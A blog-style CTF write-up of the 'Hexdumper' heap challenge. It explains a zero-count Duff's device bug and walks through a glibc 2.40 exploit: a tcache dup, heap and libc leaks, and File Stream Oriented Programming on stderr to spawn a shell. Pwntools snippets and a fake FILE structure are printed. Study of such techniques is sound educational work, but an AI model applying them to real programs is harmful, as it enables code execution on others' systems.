This weekend I played a CTF for the first time in a while. I haven’t played a weekend CTF for about 2 years now, but I was invited to play with a friend who was interested in giving one a go. It was a good laugh, although I now realise I’ve forgotten most of the Linux userland exploitation knowledge I had. So this was mostly a weekend of relearning ptmalloc (glibc’s heap allocator). Also, while playing Hexdumper, I rediscovered an interesting exploitation technique that I’d forgotten, File Stream Oriented Programming. To be clear, this techniqe is not novel, in fact it’s fairly well covered in a Pwn College module, so this is mostly a writeup of linux userland exploitation from a person who hasn’t visited this topic in a while.
The Challenge
Running the challenge, it’s pretty much your classic CRUD (Create, Remove, Update, Delete) challenge. The source code of the challenge was provided so no reverse engineering effort required.
=========== DUMP MENU ===========
1) Create a new dump
2) Hexdump a dump
3) Bite a byte
4) Merge two dumps
5) Resize dump
6) Remove dump
7) Dump all dumps
8) Dump the dump menu
0) Coredump
==>
The summary of our operations is:
- Allocate a heap object up to size 0x4141. There can be 0x41 objects allocated at one time. We can refer to this object for other operations by an ID. The ID is the position of the object in the object pointer array, the size of the object is tracked in an array of the same size.
- Hexdump a dump is essentially our way of reading the data in an object. Unsurprisingly it’s printed as a hexdump
- Bite a byte allows us to write 1 byte of data into the object at a given offset. We can write an unlimiited amount of times.
- Merge two dumps is an interesting one, essentially we merge two objects into one by providing the index of two objects, the total size of the new object
is calculated by adding the size of the two, and this is passed to
realloc. The data in object 2 is then concatonated onto object 1 and object 2 is freed. - Resize a dump allows us to define a new size, and
reallocif the new size is larger than the old size. - Remove a dump just frees the object and clears it’s entry in the object and size arrays
- Dump all dumps lists the indexes and sizes of all allocated objects
- Dump the dump menu just prints the menu
- Coredump actually just exits the program
Info
Allocating and resizing the objects causes the buffer to be initialized with 0. This is quite significant as it prevented easy exploitation methods, which I’ll discuss more later.
The Vulnerability
The bug in this challenge is inside the merge operation. The bug is hinted at pretty strongly by providing the link.
size_t len1 = dump_sizes[idx1];
size_t len2 = dump_sizes[idx2];
size_t new_len = len1 + len2;
if (new_len > MAX_DUMP_SIZE) {
printf("\tMerged size is too big! %lu > %lu\n",
new_len,
(size_t)MAX_DUMP_SIZE);
return;
}
dumps[idx1] = realloc(dumps[idx1], len1+len2);
dump_sizes[idx1] = new_len;
// Code from: https://en.wikipedia.org/wiki/Duff%27s_device
register unsigned char *to = dumps[idx1]+len1, *from = dumps[idx2];
register int count = len2;
{
register int n = (count + 7) / 8;
switch (count % 8) {
case 0: do { *to++ = *from++;
case 7: *to++ = *from++;
case 6: *to++ = *from++;
case 5: *to++ = *from++;
case 4: *to++ = *from++;
case 3: *to++ = *from++;
case 2: *to++ = *from++;
case 1: *to++ = *from++;
} while (--n > 0);
}
}
free(dumps[idx2]);
dumps[idx2] = NULL;
dump_sizes[idx2] = 0;
--no_dumps;The CTF author has implemented a manual loop unroll. Reading the wiki for this, the bug becomes apparant
This code assumes that initial count > 0. Since the output location is a memory-mapped register, the pointer to is not incremented as would be required for a memory-to-memory copy.
In the CTF, there is no check that the initial count of object 2 is not zero. The impact of this is that we can an OOB write of 8 bytes before the object 2 buffer. We can cause this to have quite an interesting affect.
We can demonstrate this by allocating two 0x20 sized objects (the object containing B’s is object B, the adjacent object is object C). We write a crafted value into object C, and then resize it to 0 bytes.

Now, when call merge and merge object C into object B, the first 8 bytes of object C’s buffer are going to be written 8 bytes before the buffer, into the chunk metadata. When the code then frees this object once the merge is complete, we end up with a differently sized object in the 0x40 tcachebin.

So we have caused a tcache dup and freed an 0x20 object into the 0x40 tcachebin. This is a very useful primitive, as when we reallocate this object, we can write out of bounds, into other objects and their metadata.
Info
There is actually another bug in this challenge, there was a negative array index vulnerability that some people used to solve this challenge.
The Exploitation
We’ve got a fairly powerful primitive, the ability to create fake chunks of arbitrary size. Since we’re dealing with libc 2.40, we will
need likely need to bypass safe linking and be wary of the other heap mitigations on modern libcs. Additionally, easy wins like
overwriting the __free_hook won’t be possible.
Bypassing Safelinking
Safe linking is a mitigation added to ptmalloc in the last few years. The mitigation protects singlely linked lists (fastbins and tcache bins).
PROTECT_PTR is used when storing a pointer in the heap, and REVEAL_PTR is
used when reading them. From the macro, we can see that the pointer is mangled with the address the pointer is going to be stored at.
#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)In CTF scenarios, this makes for a poor mitigation. Since we control the order and timing of every allocation in the program, it’s easy to determine the offset of any given allocation from the heap base, meaning if we can leak the base of the heap we can craft arbitrary pointers and bypass safe linking.
To get a heap leak we can use our primitive to create a large fake object that overlaps other allocated objects. When we then free the legitimate objects, the safelinking key and encrypted pointer will be readable via the hexdumping operation.
Below, we reallocate our fake 0x40 chunk (chunkE), and read it’s value. The userdata of size of chunkE overlaps the heap metadata containing the key and encrypted pointer. In order to free the legitimate chunks, we must write a size field back into their chunk metadata, since it was cleared during the memset that occurs on object allocation.

# free chunkD, reallocate chunkC, and read the heap pointers
chunkE = create_dump(0x38)
write_pointer(chunkC, 24, 0x31)
remove_dump(chunkA)
remove_dump(chunkD)
hexdump_dump(chunkE)
result = hexdump_to_bytestring()
leak1 = u64(result[4 * 8 : 4 * 8 + 8])
leak2 = u64(result[5 * 8 : 5 * 8 + 8])
heap_base = demangle(leak1) - 0x2A0
log.info("Leak 1: 0x%lx", demangle(leak1))
log.info("Leak 2: 0x%lx", demangle(leak2))
log.info("Heap base: 0x%lx", heap_base)Leaking Libc
We can reuse the above method for leaking libc. We can overwrite the chunk metadata of an existing object to make it large enough to be freed into the unsorted bin. Since the first object in the unsorted bin contains pointers into libc, we can then read these values and calculate libc base.

write_pointer(chunkF, 0x18, 0x511)
remove_dump(chunkJ)
hexdump_dump(chunkI)
result = hexdump_to_bytestring()
leak1 = u64(result[4 * 8 : 5 * 8])
leak2 = u64(result[5 * 8 : 6 * 8])
log.info("leak 1: 0x%lx", leak1)
log.info("leak 2: 0x%lx", leak2)
libc.address = leak1 - 0x211B20 # main arena address
log.success("libc base: 0x%lx", libc.address)Gaining Remote Code Execution
We should now have everything we need, we’ve got an arbitrary write primitive, for anywhere in libc or the heap.
The first method I attempted was to create a custom format specification table, as described here. Essentially this involves crafting a fake function table in the heap that have pointers to libc one gadgets, and overwriting _printf_function_table to point to it. Finally you register these tables by overwriting the
__printf_arginfo_table to a non-null value. Unfortunately this method fails because none of the one gadgets for libc-2.40 had constaints
that would be met when calling them, and I couldn’t figure out a way to cause the constraints to be met.
This leads onto the second attempt, using File Stream Oriented Programming. Instead, we corrupt a file structure. While researching what I could do instead, I came across this pretty good article about our options. One of the simplest entries applicable for our exploitation scenario was FSOP. I tried plugging the example code into my exploit, however due to the fact we execute our write primitive one byte at a time, exceptions were thrown by libc about an invalid table in stdout. I also came across this blog, however it lacked some serious details about how exactly you’d implement the concepts, and the linked resources no longer exist, or are written in Chinese.
To avoid triggering stdout corruption during the process of writing the payload, it became clear we would need to write to the stderr file structure. This would then need to be triggered in some way.
Glibc File Structures
In glibc, file streams have associated vtables containing function pointers for various IO operations. These vtables are used for operations like reading and flushing.
When a program exits, __run_exit_handlers is called. In order to cleanup the file structures, _IO_cleanup is called, which calls _IO_flush_all. This function loop over each file structure and performs a number of operations on them, including running the _IO_OVERFLOW macro, which redirects execution to the entry in the vtable mapped to the key __overflow.
#define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH)On earlier versions of glibc, we could set the __overflow member to an arbitrary function for code execution, but this had been mitigated: glibc performs vtable pointer validation
IO_validate_vtable (const struct _IO_jump_t *vtable)
{
uintptr_t ptr = (uintptr_t) vtable;
uintptr_t offset = ptr - (uintptr_t) &__io_vtables;
if (__glibc_unlikely (offset >= IO_VTABLES_LEN))
/* The vtable pointer is not in the expected section. Use the
slow path, which will terminate the process if necessary. */
_IO_vtable_check ();
return vtable;
}This validation does not occur, however, when using the _IO_WIDE_JUMPS_FUNC, macro which is called by _IO_WOVERFLOW.
If _IO_wfile_overflow is executed and _IO_CURRENTLY_PUTTING is not set, or f->_wide_data->_IO_write_base is null, the function will call _IO_wdoallocbuf.
_IO_wfile_overflow (FILE *f, wint_t wch)
{
if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
{
f->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return WEOF;
}
/* If currently reading or no buffer allocated. */
if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0
|| f->_wide_data->_IO_write_base == NULL)
{
/* Allocate a buffer if needed. */
if (f->_wide_data->_IO_write_base == 0)
{
_IO_wdoallocbuf (f);
_IO_free_wbackup_area (f);
_IO_wsetg (f, f->_wide_data->_IO_buf_base,
f->_wide_data->_IO_buf_base, f->_wide_data->_IO_buf_base);
if (f->_IO_write_base == NULL)
{
_IO_doallocbuf (f);
_IO_setg (f, f->_IO_buf_base, f->_IO_buf_base, f->_IO_buf_base);
}
}If _IO_UNBUFFERED is not set, _IO_WDOALLOCATE will be called.
_IO_wdoallocbuf (FILE *fp)
{
if (fp->_wide_data->_IO_buf_base)
return;
if (!(fp->_flags & _IO_UNBUFFERED))
if ((wint_t)_IO_WDOALLOCATE (fp) != WEOF)
return;
_IO_wsetb (fp, fp->_wide_data->_shortbuf,
fp->_wide_data->_shortbuf + 1, 0);
}If macro is called fp->_wide_data->wide_vtable->__doallocate will be called, so if we craft a fake wide_vtable with a malicious pointer in the __doallocate member, it will be called, passing a pointer to the file structure as the first argument.
This is our code execution, but how do we reach here, the program isn’t using wide characters? Well, if we corrupt the stderr vtable so that _IO_file_jumps is replaced by _IO_wfile_jumps, we can enter this call chain.
Crafting the Fake File Structure
File Structure Oriented Programming seems to involve interleaving various pointers into the fake file structure to pass the security validations. So I ended up with the following
fake = FileStructure()
fake.flags = u64(p32(0xFBAD0101) + b";sh\x00")
fake._IO_save_end = p64(libc.sym.system)
fake._lock = libc.sym["_IO_2_1_stderr_"] - 0x10
fake._wide_data = libc.sym["_IO_2_1_stderr_"] - 0x10
fake.unknown2 = (
p64(0)
+ p64(0)
+ p64(0)
+ p32(1)
+ p32(0)
+ p64(0)
+ p64(libc.sym["_IO_2_1_stderr_"] - 0x10)
+ p64(libc.sym["_IO_wfile_jumps"] + 0x40)
)flagsis set to a legitimate value, and appending the valuesh. When we get code redirection, a pointer to the file structure will be passed in therdiregister, so this should be our shell command to run_wide_datapoints to our file structure - 0x10, this essentially makes the file structure also a_wide_vtablevtable, and when_IO_WDOALLOCATEis called, the value infake._IO_save_endwill be called_IO_save_endis set to the functio we wish to run, as mentioned above this will be called by the_IO_WDOALLOCATEmacro._lockpoints to a fake write lock.unknown2is our stderr vtable. We have placed values for our fake vtable, which will cause the exploit call chain to be triggered.
Using this in our exploit leads to RCE.
